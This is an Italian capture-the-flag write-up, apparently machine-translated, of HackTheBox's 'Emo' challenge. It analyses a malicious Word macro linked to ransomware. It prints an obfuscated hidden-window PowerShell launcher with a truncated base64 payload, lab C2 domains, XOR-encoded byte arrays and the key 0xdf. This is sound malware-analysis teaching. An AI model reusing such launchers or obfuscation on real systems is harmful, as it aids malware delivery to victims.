Abbiamo trattato l'analisi di un documento Office che contiene un codice macro incorporato scritto in Visual Basic. È stato affermato che il documento causava un'infezione da ransomware, quindi abbiamo eseguito un'analisi statica che includeva l'estrazione di stringhe rilevanti, il calcolo dell'hash MD5, dei metadati e la rivelazione della routine Macro nascosta utilizzando strumenti come olevba. Quindi abbiamo inviato l'hash a motori di analisi online come VirusTotal e si è rivelato dannoso in quanto esegue un comando Powershell che contatta il server c2 per scaricare ulteriori payload. Abbiamo anche trovato istanze di crittografia XOR insieme alla chiave XOR che veniva poi utilizzata per decrittografare i caratteri precedentemente codificati in forma decimale. Questo faceva parte Sfida Emo di HackTheBox.
Ottieni le note sul certificato OSCP
Il corso pratico completo sul Penetration Testing delle applicazioni Web
Descrizione della sfida
Il ransomware WearRansom si è appena diffuso nella nostra azienda. Il SOC ha rintracciato il primo accesso ad un attacco di phishing, un documento Word con macro. Dai un'occhiata al documento e vedi se riesci a trovare qualcos'altro sul malware e magari un flag.
Video in evidenza
In questo video, vestiamo i panni di un soccorritore e analizziamo un documento word di Office dannoso che contiene un codice macro dannoso che esegue Powershell che esegue alcune crittografie XOR e chiama il server di comando e controllo per rilasciare più payload sulla macchina infetta. Quindi, in pratica, isoleremo la macchina infetta, interromperemo la connessione a Internet e la cloneremo per l'analisi.
Quindi per prima cosa inizieremo con un'analisi statica del malware eseguendo diversi comandi come l'estrazione di stringhe rilevanti dal campione, il calcolo dell'hash MD5 e l'estrazione delle routine Macro utilizzando alcuni strumenti come olevba e oledump.py
La routine Macro contiene i comandi e i payload che vengono eseguiti sulla macchina incluso il comando Powershell. Dopo l'analisi statica, eseguiamo l'analisi dinamica che rivela i processi generati, le connessioni di rete, le chiavi di registro modificate e gli eventi attivati. Inoltre devi considerare il timestamp quando cerchi gli eventi nel Visualizzatore eventi. Quindi, se hai aperto durante l'analisi dinamica, diciamo che hai aperto il documento dannoso alle 19:35, dovrai utilizzare questo orario e filtrare gli eventi che sono stati attivati esattamente al timestamp specificato.
Il rapporto di analisi dinamica di questo campione è disponibile su any.run
Di seguito sono riportati alcuni dei domini con cui il campione ha comunicato
da-industrial.htb daprofesional.htb www.outspokenvisions.htb dagranitegiare.htb mobsouk.htb biglaughs.htb ngllogistics.htbDi seguito è riportato il comando Powershell rivelato dal report di analisi dinamica
POwersheLL -windowstyle hidden -ENCOD IABTAFYAIAAgADAAegBYACAAKABbAFQAeQBQAGUAXQAoACIAewAyAH0AewAwAH0AewA0AH0AewAzAH0AewAxAH0AIgAtAGYAIAAnAGUAJwAsACcAcgBFAEMAdABvAHIAWQAnACwAJwBzAFkAcwB0ACcALAAnAC4ASQB PA
Il comando PowerShell precedente verrà decodificato utilizzando Cyberchef utilizzando frombase64 e rimuoverà i byte null. Questo ti darà il carico utile completo da cui possiamo evidenziare le seguenti dichiarazioni di variabile:
$FN5ggmsH += (186.141.228.182.177.171.229.236.239.239.239.228.181.182.171.229.234.239.239.228)
$FN5ggmsH += (185,179,190,184,229,151,139,157,164,235,177,239,171,183,236,141,128,187,235,134,128,158,177,176,139)
$FN5ggmsH += (183.154.173.128.175.151.238.140.183.162.228.170.173.179.229)
Se utilizziamo chardecode e utilizziamo decimal in Cyberchef, ci fornirà una stringa crittografata con XOR per la quale la chiave è 0xdf che può essere trovata nella riga che evidenzia quanto segue nel payload originale dopo averlo decodificato in Cyberchef.
+= ([byte][carattere]${_} -bxor 0xdf )
Videoprocedura dettagliata
